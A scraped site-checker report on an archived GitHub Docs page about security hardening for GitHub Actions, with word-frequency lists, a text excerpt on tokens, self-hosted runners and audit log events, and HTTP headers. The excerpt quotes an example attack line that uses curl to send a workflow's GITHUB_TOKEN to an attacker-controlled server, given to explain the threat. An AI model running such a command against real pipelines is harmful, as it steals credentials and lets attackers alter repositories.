If you are not sure if the website you would like to visit is secure, you can verify it here. Enter the website address of the page and see parts of its content and the thumbnail images on this site. None (if any) dangerous scripts on the referenced page will be executed. Additionally, if the selected site contains subpages, you can verify it (review) in batches containing 5 pages.
favicon.ico: web.archive.org/web/20230103075616/https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions - Security hardening for GitHub .

site address: web.archive.org/web/20221219200455/https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions redirected to: web.archive.org/web/20230103075616/https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

site title: Security hardening for GitHub Actions - GitHub Docs

Our opinion (on Tuesday 22 September 2026 16:11:38 UTC):

GREEN status (no comments) - no comments
After content analysis of this website we propose the following hashtags:



Meta tags:
description=Good security practices for using GitHub Actions features.;
keywords=Security;

Headings (most frequently used words):

for, using, events, of, hosted, github, actions, to, the, script, runners, self, workflows, runner, help, an, hardening, this, secrets, changes, injection, access, cloud, third, party, from, repository, your, management, security, in, article, overview, codeowners, monitor, understanding, risk, injections, good, practices, mitigating, attacks, openid, connect, resources, reusing, preventing, creating, or, approving, pull, requests, openssf, scorecards, secure, potential, impact, compromised, considering, cross, reviewing, supply, chain, auditing, did, doc, you, us, make, these, docs, great, still, need, example, attack, action, instead, inline, recommended, intermediate, environment, variable, starter, code, scanning, restricting, permissions, tokens, accessing, exfiltrating, data, stealing, job, github_token, modifying, contents, planning, strategy, authenticating, provider, environments, configuration, secret, groups, workflow, activities,

Text of the page (most frequently used words):
the (301), for (162), #github (113), runner (83), can (79), and (78), hosted (76), workflow (70), self (69), #actions (65), you (64), when (63), see (61), information (61), access (61), more (58), using (55), secrets (54), repository (52), your (51), triggered (51), that (49), this (49), workflows (44), runners (42), not (39), with (39), use (35), are (33), environment (32), action (31), secret (31), security (29), from (28), organization (28), run (27), api (25), group (25), enterprise (25), example (24), job (23), script (22), title (22), code (21), used (21), about (20), only (20), github_token (20), rest (19), should (19), within (19), token (19), events (17), org (17), repositories (16), have (16), permissions (16), help (15), any (15), test (15), all (14), json (14), create (14), audit (14), log (14), connect (14), these (13), they (13), viewed (13), event (13), deploy (13), then (13), openid (13), jobs (13), build (13), risk (13), attacker (13), injection (13), pull (12), visible (12), csv (12), export (12), personal (12), hardening (12), write (12), value (12), there (11), creating (11), cloud (11), runs (11), add (11), will (11), how (10), application (10), repo (10), other (10), environments (10), logs (10), which (10), tokens (10), level (10), because (10), status (9), starter (9), third (9), party (9), changes (9), management (9), could (9), team (9), same (9), server (9), practices (9), docs (8), scanning (8), has (8), reviewing (8), removed (8), updated (8), set (8), data (8), but (8), approach (8), user (8), keys (8), requests (8), compromised (8), good (8), need (7), instead (7), also (7), created (7), remove (7), checking (7), adding (7), account (7), consider (7), each (7), manage (7), mitigate (7), such (7), sensitive (7), configured (7), compromise (7), read (7), required (7), echo (7), publish (7), shell (7), pull_request (7), request (6), deployments (6), list (6), after (6), description (6), configuration (6), groups (6), new (6), registered (6), following (6), monitor (6), provider (6), single (6), might (6), some (6), command (6), private (6), impact (6), grant (6), never (6), sbom (6), authentication (6), would (6), attack (6), commands (6), directly (6), variable (6), issues (6), scorecards (6), octocat (6), migrate (6), make (5), policy (5), before (5), been (5), started (5), being (5), encrypted (5), control (5), recommended (5), well (5), their (5), own (5), another (5), view (5), able (5), risks (5), way (5), ssh (5), into (5), untrusted (5), name (5), key (5), interact (5), issue (5), specific (5), note (5), resources (5), content (5), uses (5), sha (5), sure (5), ensure (5), check (5), valid (5), files (5), containers (5), exit (5), context (5), values (5), deployment (5), redacted (5), packages (5), guides (5), java (5), support (4), web (4), running (4), added (4), changed (4), removing (4), update_actions_secret (4), was (4), scoped (4), share (4), automatically (4), one (4), azure (4), result (4), those (4), during (4), release (4), users (4), through (4), artifacts (4), supply (4), chain (4), individual (4), accessing (4), cross (4), modifying (4), permission (4), expression (4), stored (4), malicious (4), steps (4), potential (4), reusing (4), tag (4), generate (4), credentials (4), scripts (4), else (4), inline (4), input (4), label (4), review (4), redaction (4), cli (4), service (4), still (3), open (3), source (3), did (3), find (3), codeql (3), available (3), included (3), trigger (3), deleted (3), history (3), changing (3), runner_group_updated (3), self_hosted_runner_updated (3), stopped (3), self_hosted_runner_offline (3), self_hosted_runner_online (3), remove_self_hosted_runner (3), register_self_hosted_runner (3), file (3), remove_actions_secret (3), create_actions_secret (3), setting (3), authenticating (3), cannot (3), execution (3), however (3), machine (3), services (3), always (3), what (3), machines (3), organizations (3), managing (3), fork (3), including (3), although (3), public (3), process (3), images (3), com (3), releases (3), software (3), grants (3), broad (3), perform (3), later (3), granted (3), even (3), app (3), may (3), possible (3), intentionally (3), currently (3), allow (3), significant (3), time (3), allowing (3), assigned (3), contents (3), generated (3), once (3), http (3), prevent (3), accidental (3), sent (3), addition (3), custom (3), argument (3), take (3), attacks (3), secure (3), configure (3), approving (3), approve (3), pinning (3), commit (3), trust (3), storing (3), variables (3), docker (3), restricting (3), intermediate (3), vulnerable (3), output (3), expressions (3), contexts (3), codeowners (3), register (3), features (3), search (3), english (3), free (3), pro (3), customize (3), contact (2), privacy (2), terms (2), 2023 (2), learn (2), wrong (2), allows (2), vulnerabilities (2), enabled (2), disabled (2), disable_workflow (2), deleting (2), completed (2), activities (2), runner_group_runner_removed (2), moving (2), runner_group_runners_added (2), runner_group_removed (2), runner_group_created (2), runner_group_runners_updated (2), delete (2), type (2), auditing (2), hashicorp (2), vault (2), its (2), lived (2), since (2), recommendation (2), highest (2), too (2), plan (2), centralized (2), various (2), who (2), planning (2), strategy (2), attempt (2), intended (2), network (2), aws (2), metadata (2), minimum (2), mindful (2), invoking (2), among (2), others (2), schedule (2), multiple (2), consequently (2), reduce (2), similarly (2), internal (2), depending (2), settings (2), reviews (2), isolated (2), around (2), ephemeral (2), clean (2), virtual (2), persistently (2), execute (2), than (2), image (2), https (2), bill (2), materials (2), installed (2), provide (2), building (2), similar (2), classic (2), indirectly (2), needed (2), apps (2), granular (2), them (2), authenticate (2), push (2), git (2), graphql (2), types (2), expires (2), approaches (2), flow (2), feature (2), privileged (2), many (2), model (2), inadvertently (2), considering (2), steal (2), longer (2), useful (2), automate (2), stealing (2), disclosure (2), send (2), some_secret (2), redact (2), printed (2), exfiltrating (2), memory (2), referenced (2), fakeaction (2), where (2), sections (2), tool (2), risky (2), follow (2), developers (2), project (2), number (2), openssf (2), choose (2), preventing (2), above (2), associated (2), verified (2), creator (2), badge (2), marketplace (2), bad (2), actor (2), pin (2), handling (2), expected (2), unintended (2), hosts (2), full (2), length (2), helps (2), writing (2), directory (2), processes (2), executing (2), starts (2), start (2), different (2), mitigating (2), executed (2), occur (2), adds (2), obvious (2), potentially (2), branch (2), email (2), target (2), interpreted (2), harden (2), attackers (2), end (2), body (2), composite (2), understanding (2), injections (2), owners (2), approval (2), reviewer (2), therefore (2), least (2), privileges (2), requiring (2), rotate (2), periodically (2), practice (2), default (2), testing (2), invalid (2), inputs (2), properly (2), manually (2), handled (2), transformed (2), base64 (2), ever (2), jwt (2), structured (2), fail (2), exact (2), certain (2), logging (2), store (2), concepts (2), overview (2), billing (2), syntax (2), container (2), troubleshoot (2), larger (2), enable (2), node (2), maven (2), gradle (2), xcode (2), applications (2), google (2), continuous (2), skip (2), concurrency (2), sep (2), blog, training, developer, pricing, inc, ask, community, contribute, contribution, something, unclear, submit, great, doc, reach, production, provides, suggested, construct, starting, scratch, analysis, powered, rejected, reject_workflow_job, approved, approve_workflow_job, includes, were, provided, interface, prepared_workflow_job, rerun_workflow_run, previously, enable_workflow, delete_workflow_run, created_workflow_run, viewing, completed_workflow_run, cancelled, canceling, cancel_workflow_run, members, member, update_actions_access_settings, actions_enabled, tables, describe, track, tracks, administrative, tasks, records, performed, intend, short, overhead, increases, numbers, between, ownership, owns, simplest, decentralized, effectively, encounter, difficulties, future, mutual, gives, location, levels, hierarchy, placement, determines, customers, partially, implementing, systems, destroy, effective, guarantee, line, arguments, seen, lead, leakages, does, amount, kept, capable, resides, defined, onto, wide, scope, boundaries, organizing, separate, restrict, almost, against, cautious, anyone, generally, gaining, susceptible, guarantees, meaning, otherwise, gain, placed, bootstrap, sboms, windows, ubuntu, locate, assets, filename, format, found, attachments, zip, pre, vulnerability, scanner, validate, product, include, comprehensive, everything, went, membership, intending, clones, pushes, apis, leave, immediately, break, debugging, challenging, fine, grained, belongs, scalable, avoided, favor, alternatives, select, install, installation, clone, appropriate, requirements, credential, whenever, invoked, begins, finished, describes, descending, order, preference, yet, supported, interactions, place, much, broader, roadmap, elevating, necessary, implemented, carefully, caution, must, taken, affect, granting, collaborators, restricted, modify, receives, limited, just, contains, expired, work, limitation, fractions, second, calling, controlled, curl, exfiltrate, stolen, true, boundary, obfuscated, exfiltrated, arbitrary, external, 200, scrubs, harvested, determined, publish_key, vary, program, obtained, disk, accessible, accessed, printenv, differ, triggers, issue_comment, scan, downloaded, library, automated, flags, best, alerts, built, experience, checks, pinned, disabling, limiting, automation, merged, without, proper, oversight, principles, described, apply, outlined, most, option, specifying, convenient, widely, like, specify, creators, signal, indicates, written, whose, identity, author, moved, gains, logged, immutable, particular, backdoor, collision, object, payload, means, very, sourcing, querying, shared, interacting, socket, inspecting, supports, oidc, let, stop, long, benefits, exposed, advanced, consolidated, category, tab, beta, subject, change, doesn, generation, double, quote, avoid, general, recommendations, word, splitting, attempted, unsuccessful, env, bash, preferred, checktitle, passed, character, interrupt, statement, inject, github_workspace, executes, temporary, inside, evaluated, substituted, resulting, validity, explain, less, sources, names, addresses, quite, flexible, permitted, vector, zzz, ifs, hello, calls, anywhere, executable, adopting, defensive, programming, posture, treated, typically, ref, page_name, message, head_ref, default_branch, whether, strings, made, proposed, first, require, designated, warning, reviewers, protect, until, window, confirm, increased, minimally, shown, errors, subsequently, error, stderr, stdout, explicitly, registering, applies, sort, transformation, encoding, url, encoded, formally, appears, signed, won, enters, cause, largely, relies, finding, match, blob, xml, yaml, encapsulate, significantly, reduces, probability, mechanism, attempts, appear, looks, matches, common, encodings, ways, guaranteed, proactive, limit, reaching, occurs, submitted, client, side, encryption, minimize, related, exception, infrastructure, uploaded, decrypt, injected, runtime, libsodium, sealed, boxes, plaintext, rather, guide, explains, unfamiliar, core, article, 한국어, русский, français, deutsch, português, brasil, español, 日本語, 简体中文, versions, npm, electron, desktop, education, pages, communities, sponsors, discussions, codespaces, copilot, site, payments, administrators, profile, get, setup, maintain, codes, dockerfile, javascript, automatic, proxy, servers, autoscale, current, notifications, debug, visualization, graph, monitoring, troubleshooting, travis, jenkins, gitlab, circleci, pipelines, migration, importer, creation, card, move, comment, close, inactive, labels, packaging, redis, postgresql, containerized, sign, reusable, providers, platform, kubernetes, engine, amazon, ecs, xamarin, swift, ruby, python, powershell, net, ant, integration, download, disable, cancel, define, outputs, assign, matrixes, conditions, cache, dependencies, reuse, matrix, examples, limits, essential, understand, quickstart, products, main, wayback, archive, 20230103075616, timestamps, capture, success, 2024, 2022, feb, jan, dec, 2021, 2026, 439, captures,


Text of the page (random words):
ired the token is no longer useful to an attacker to work around this limitation they can automate the attack and perform it in fractions of a second by calling an attacker controlled server with the token for example a set e curl http example com token github_token modifying the contents of a repository the attacker server can use the github api to modify repository content including releases if the assigned permissions of github_token are not restricted considering cross repository access github actions is intentionally scoped for a single repository at a time the github_token grants the same level of access as a write access user because any write access user can access this token by creating or modifying a workflow file elevating the permissions of the github_token if necessary users have specific permissions for each repository so allowing the github_token for one repository to grant access to another would impact the github permission model if not implemented carefully similarly caution must be taken when adding github authentication tokens to a workflow because this can also affect the github permission model by inadvertently granting broad access to collaborators we have a plan on the github roadmap to support a flow that allows cross repository access within github but this is not yet a supported feature currently the only way to perform privileged cross repository interactions is to place a github authentication token or ssh key as a secret within the workflow because many authentication token types do not allow for granular access to specific resources there is significant risk in using the wrong token type as it can grant much broader access than intended this list describes the recommended approaches for accessing repository data within a workflow in descending order of preference the github_token this token is intentionally scoped to the single repository that invoked the workflow and can have the same level of access as a write access user on the repository the token is created before each job begins and expires when the job is finished for more information see authenticating with the github_token the github_token should be used whenever possible repository deploy key deploy keys are one of the only credential types that grant read or write access to a single repository and can be used to interact with another repository within a workflow for more information see managing deploy keys note that deploy keys can only clone and push to the repository using git and cannot be used to interact with the rest or graphql api so they may not be appropriate for your requirements github app tokens github apps can be installed on select repositories and even have granular permissions on the resources within them you could create a github app internal to your organization install it on the repositories you need access to within your workflow and authenticate as the installation within your workflow to access those repositories personal access tokens you should never use a personal access token classic these tokens grant access to all repositories within the organizations that you have access to as well as all personal repositories in your personal account this indirectly grants broad access to all write access users of the repository the workflow is in if you do use a personal access token you should never use a personal access token from your own account if you later leave an organization workflows using this token will immediately break and debugging this issue can be challenging instead you should use a fine grained personal access tokens for a new account that belongs to your organization and that is only granted access to the specific repositories that are needed for the workflow note that this approach is not scalable and should be avoided in favor of alternatives such as deploy keys ssh keys on a personal account workflows should never use the ssh keys on a personal account similar to personal access tokens classic they grant read write permissions to all of your personal repositories as well as all the repositories you have access to through organization membership this indirectly grants broad access to all write access users of the repository the workflow is in if you re intending to use an ssh key because you only need to perform repository clones or pushes and do not need to interact with public apis then you should use individual deploy keys instead reviewing the supply chain for github hosted runners you can view a software bill of materials sbom to see what software was pre installed on the github hosted runner image used during your workflow runs you can provide your users with the sbom which they can run through a vulnerability scanner to validate if there are any vulnerabilities in the product if you are building artifacts you can include this sbom in your bill of materials for a comprehensive list of everything that went into creating your software sboms are available for windows and ubuntu runner images you can locate the sbom for your build in the release assets at https github com actions runner images releases an sbom with a filename in the format of sbom image name json zip can be found in the attachments of each release hardening for self hosted runners github hosted runners execute code within ephemeral and clean isolated virtual machines meaning there is no way to persistently compromise this environment or otherwise gain access to more information than was placed in this environment during the bootstrap process self hosted runners for github do not have guarantees around running in ephemeral clean virtual machines and can be persistently compromised by untrusted code in a workflow as a result self hosted runners should almost never be used for public repositories on github because any user can open pull requests against the repository and compromise the environment similarly be cautious when using self hosted runners on private or internal repositories as anyone who can fork the repository and open a pull request generally those with read access to the repository are able to compromise the self hosted runner environment including gaining access to secrets and the github_token which depending on its settings can grant write access to the repository although workflows can control access to environment secrets by using environments and required reviews these workflows are not run in an isolated environment and are still susceptible to the same risks when run on a self hosted runner when a self hosted runner is defined at the organization or enterprise level github can schedule workflows from multiple repositories onto the same runner consequently a security compromise of these environments can result in a wide impact to help reduce the scope of a compromise you can create boundaries by organizing your self hosted runners into separate groups you can restrict what organizations and repositories can access runner groups for more information see managing access to self hosted runners using groups you should also consider the environment of the self hosted runner machines what sensitive information resides on the machine configured as a self hosted runner for example private ssh keys api access tokens among others does the machine have network access to sensitive services for example azure or aws metadata services the amount of sensitive information in this environment should be kept to a minimum and you should always be mindful that any user capable of invoking workflows has access to this environment some customers might attempt to partially mitigate these risks by implementing systems that automatically destroy the self hosted runner after each job execution however this approach might not be as effective as intended as there is no way to guarantee that a self hosted runner only runs one job some jobs will use secrets as command line arguments which can be seen by another job running on the same runner such as ps x w this can lead to secret leakages planning your management strategy for self hosted runners a self hosted runner can be added to various levels in your github hierarchy the enterprise organization or repository level this placement determines who will be able to manage the runner centralized management if you plan to have a centralized team own the self hosted runners then the recommendation is to add your runners at the highest mutual organization or enterprise level this gives your team a single location to view and manage your runners if you only have a single organization then adding your runners at the organization level is effectively the same approach but you might encounter difficulties if you add another organization in the future decentralized management if each team will manage their own self hosted runners then the recommendation is to add the runners at the highest level of team ownership for example if each team owns their own organization then it will be simplest if the runners are added at the organization level too you could also add runners at the repository level but this will add management overhead and also increases the numbers of runners you need since you cannot share runners between repositories authenticating to your cloud provider if you are using github actions to deploy to a cloud provider or intend to use hashicorp vault for secret management then its recommended that you consider using openid connect to create short lived well scoped access tokens for your workflow runs for more information see about security hardening with openid connect auditing github actions events you can use the audit log to monitor administrative tasks in an organization the audit log records the type of action when it was run and which personal account performed the action for example you can use the audit log to track the org update_actions_secret event which tracks changes to organization secrets the following tables describe the github actions events that you can find in the audit log for more information on using the audit log see reviewing the audit log for your organization and reviewing audit logs for your enterprise events for environments action description environment create_actions_secret triggered when a secret is created in an environment for more information see environment secrets environment delete triggered when an environment is deleted for more information see deleting an environment environment remove_actions_secret triggered when a secret is removed from an environment for more information see environment secrets environment update_actions_secret triggered when a secret in an environment is updated for more information see environment secrets events for configuration changes action description repo actions_enabled triggered when github actions is enabled for a repository can be viewed using the ui this event is not visible when you access the audit log using the rest api for more information see using the rest api repo update_actions_access_settings triggered when the setting to control how your repository is used by github actions workflows in other repositories is changed events for secret management action description org create_actions_secret triggered when a github actions secret is created for an organization for more information see creating encrypted secrets for an organization org remove_actions_secret triggered when a github actions secret is removed org update_actions_secret triggered when a github actions secret is updated repo create_actions_secret triggered when a github actions secret is created for a repository for more information see creating encrypted secrets for a repository repo remove_actions_secret triggered when a github actions secret is removed repo update_actions_secret triggered when a github actions secret is updated events for self hosted runners action description enterprise register_self_hosted_runner triggered when a new self hosted runner is registered for more information see adding a self hosted runner to an enterprise enterprise remove_self_hosted_runner triggered when a self hosted runner is removed enterprise runner_group_runners_updated triggered when a runner group s member list is updated for more information see set self hosted runners in a group for an organization enterprise self_hosted_runner_online triggered when the runner application is started can only be viewed using the rest api not visible in the ui or json csv export for more information see checking the status of a self hosted runner enterprise self_hosted_runner_offline triggered when the runner application is stopped can only be viewed using the rest api not visible in the ui or json csv export for more information see checking the status of a self hosted runner enterprise self_hosted_runner_updated triggered when the runner application is updated can be viewed using the rest api and the ui this event is not included when you export the audit log as json data or a csv file for more information see about self hosted runners and reviewing the audit log for your organization org register_self_hosted_runner triggered when a new self hosted runner is registered for more information see adding a self hosted runner to an organization org remove_self_hosted_runner triggered when a self hosted runner is removed for more information see removing a runner from an organization org runner_group_runners_updated triggered when a runner group s list of members is updated for more information see set self hosted runners in a group for an organization org runner_group_updated triggered when the configuration of a self hosted runner group is changed for more information see changing the access policy of a self hosted runner group org self_hosted_runner_online triggered when the runner application is started can only be viewed using the rest api not visible in the ui or json csv export for more information see checking the status of a self hosted runner org self_hosted_runner_offline triggered when the runner application is stopped can only be viewed using the rest api not visible in the ui or json csv export for more information see checking the status of a self hosted runner org self_hosted_runner_updated triggered when the runner application is updated can be viewed using the rest api and the ui not visible in the json csv export for more information see about self hosted runners repo register_self_hosted_runner triggered when a new self hosted runner is registered for more information see adding a self hosted runner to a repository repo remove_self_hosted_runner triggered when a self hosted runner is removed for more information see removing a runner from a repository repo self_hosted_runner_online triggered when the runner application is started can only be viewed using the rest api not visible in the ui or json csv export for more information see checking the status of a self hosted runner repo self_hosted_runner_offline triggered when the runner application ...
Thumbnail images (randomly selected): * Images may be subject to copyright.GREEN status (no comments)
  • loading

Verified site has: 220 subpage(s). Do you want to verify them? Verify pages:

1-5 6-10 11-15 16-20 21-25 26-30 31-35 36-40 41-45 46-50
51-55 56-60 61-65 66-70 71-75 76-80 81-85 86-90 91-95 96-100
101-105 106-110 111-115 116-120 121-125 126-130 131-135 136-140 141-145 146-150
151-155 156-160 161-165 166-170 171-175 176-180 181-185 186-190 191-195 196-200
201-205 206-210 211-215 216-220


The site also has references to the 2 subdomain(s)

  archive.org  Verify   help.archive.org  Verify


Top 50 hastags from of all verified websites.

Supplementary Information (add-on for SEO geeks)*- See more on header.verify-www.com

Header

HTTP/1.1 302 FOUND
Server nginx
Date Tue, 22 Sep 2026 16:11:37 GMT
Content-Type text/plain; charset=utf-8
Content-Length 0
Connection close
x-archive-redirect-reason found capture at 20230103075616
location htt???/web.archive.org/web/20230103075616/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions
server-timing captures_list;dur=0.436556, exclusion.robots;dur=0.080755, exclusion.robots.policy;dur=0.073561, esindex;dur=0.006739, cdx.remote;dur=5.665301, LoadShardBlock;dur=116.838904, PetaboxLoader3.datanode;dur=63.645838
x-app-server wwwb-app206-dc6
x-ts 302
x-tr 141
server-timing TR;dur=0,Tw;dur=0,Tc;dur=1
set-cookie wb-p-SERVER=wwwb-app206; path=/
X-location All
X-AS 16276
X-RL 0
X-NA 0
X-Page-Cache MISS
Server-Timing MISS
X-NID OVH SAS
Referrer-Policy no-referrer-when-downgrade
Permissions-Policy interest-cohort=()
X-sd 0
HTTP/1.1 200 OK
Server nginx
Date Tue, 22 Sep 2026 16:11:39 GMT
Content-Type text/html; charset=utf-8
Transfer-Encoding chunked
Connection close
x-archive-orig-connection close
x-archive-orig-content-length 57573
x-archive-orig-cache-control public, max-age=60
x-archive-orig-access-control-allow-origin *
x-archive-orig-content-security-policy default-src none ;prefetch-src self ;connect-src self ;font-src self data: githubdocs.azureedge.net;img-src self github.com *.github.com *.githubusercontent.com *.githubassets.com data: githubdocs.azureedge.net placehold.it;object-src self ;script-src self data: githubdocs.azureedge.net;frame-src self github.com *.github.com *.githubusercontent.com *.githubassets.com htt????/www.youtube-nocookie.com;frame-ancestors self github.com *.github.com *.githubusercontent.com *.githubassets.com;style-src self unsafe-inline data: githubdocs.azureedge.net;child-src self ;upgrade-insecure-requests;base-uri self ;form-action self ;script-src-attr none
x-archive-orig-cross-origin-opener-policy same-origin
x-archive-orig-cross-origin-resource-policy same-origin
x-archive-orig-x-dns-prefetch-control off
x-archive-orig-x-frame-options SAMEORIGIN
x-archive-orig-x-download-options noopen
x-archive-orig-x-content-type-options nosniff
x-archive-orig-origin-agent-cluster ?1
x-archive-orig-x-permitted-cross-domain-policies none
x-archive-orig-referrer-policy strict-origin-when-cross-origin
x-archive-orig-x-xss-protection 0
x-archive-orig-x-powered-by Next.js
x-archive-orig-x-azure-ref 0VdyzYwAAAACCOySJFhwMTo0ZxQ0jisr3UEhMMzBFREdFMDMwOAA1OTZkNzhhMi1jYTVmLTQ3OWQtYmNkYy0wODM1ODMzMTc0YjI=
x-archive-orig-via 1.1 varnish, 1.1 varnish
x-archive-orig-accept-ranges bytes
x-archive-orig-date Tue, 03 Jan 2023 07:56:16 GMT
x-archive-orig-age 842
x-archive-orig-x-served-by cache-iad-kiad7000083-IAD, cache-sjc10079-SJC
x-archive-orig-x-cache CONFIG_NOCACHE, HIT, MISS
x-archive-orig-x-cache-hits 1, 0
x-archive-orig-x-timer S1672732576.191765,VS0,VE90
x-archive-orig-vary Accept-Encoding
x-archive-orig-strict-transport-security max-age=31557600
x-archive-guessed-content-type text/html
x-archive-guessed-charset utf-8
x-archive-orig-content-encoding gzip
memento-datetime Tue, 03 Jan 2023 07:56:16 GMT
link <htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= original , <htt???/web.archive.org/web/timemap/link/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= timemap ; type= application/link-format , <htt???/web.archive.org/web/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= timegate , <htt???/web.archive.org/web/20210923080222/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= first memento ; datetime= Thu, 23 Sep 2021 08:02:22 GMT , <htt???/web.archive.org/web/20221130201344/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= prev memento ; datetime= Wed, 30 Nov 2022 20:13:44 GMT , <htt???/web.archive.org/web/20230103075616/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= memento ; datetime= Tue, 03 Jan 2023 07:56:16 GMT , <htt???/web.archive.org/web/20230109063800/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= next memento ; datetime= Mon, 09 Jan 2023 06:38:00 GMT , <htt???/web.archive.org/web/20260903160157/htt????/docs.github.com/en/actions/security-guides/security-hardening-for-github-actions>; rel= last memento ; datetime= Thu, 03 Sep 2026 16:01:57 GMT
content-security-policy default-src self unsafe-eval unsafe-inline data: blob: archive.org web.archive.org web-static.archive.org wayback-api.archive.org athena.archive.org analytics.archive.org pragma.archivelab.org wwwb-events.archive.org
x-archive-src SPNOUTLINKS-20230103071633-crawl901/SPNOUTLINKS-20230103074758-00899.warc.gz
server-timing captures_list;dur=0.740496, exclusion.robots;dur=0.115491, exclusion.robots.policy;dur=0.101678, esindex;dur=0.010459, cdx.remote;dur=20.281398, LoadShardBlock;dur=171.196343, PetaboxLoader3.datanode;dur=231.320734, PetaboxLoader3.resolve;dur=263.593673, load_resource;dur=484.022598, nav;dur=0.260702
x-app-server wwwb-app246-dc8
x-ts 200
x-tr 867
server-timing TR;dur=0,Tw;dur=0,Tc;dur=1
set-cookie wb-p-SERVER=wwwb-app246; path=/
X-location All
X-AS 16276
X-RL 0
X-NA 0
X-Page-Cache MISS
Server-Timing MISS
X-NID OVH SAS
Referrer-Policy no-referrer-when-downgrade
Permissions-Policy interest-cohort=()
X-sd 0
Content-Encoding gzip

Meta Tags

title="Security hardening for GitHub Actions - GitHub Docs"
charset="utf-8"
name="viewport" content="width=device-width, initial-scale=1"
name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"
name="description" content="Good security practices for using GitHub Actions features."
name="keywords" content="Security"
name="path-language" content="en"
name="path-version" content="free-pro-team@latest"
name="path-product" content="actions"
name="path-article" content="actions/security-guides/security-hardening-for-github-actions"
name="page-type" content="overview"
name="page-document-type" content="article"
name="status" content="200"
property="og:site_name" content="GitHub Docs"
property="og:title" content="Security hardening for GitHub Actions - GitHub Docs"
property="og:type" content="article"
property="og:url" content="htt???/web.archive.org/web/20230103075616/htt????/ghdocs-prod.azurewebsites.net/en/actions/security-guides/security-hardening-for-github-actions"
property="og:image" content="htt???/web.archive.org/web/20230103075616im_/htt????/github.githubassets.com/images/modules/open_graph/github-logo.png"
name="next-head-count" content="29"

Load Info

page size74303
load time (s)1.923926
redirect count1
speed download38639
server IP 207.241.237.3
* all occurrences of the string "http://" have been changed to "htt???/"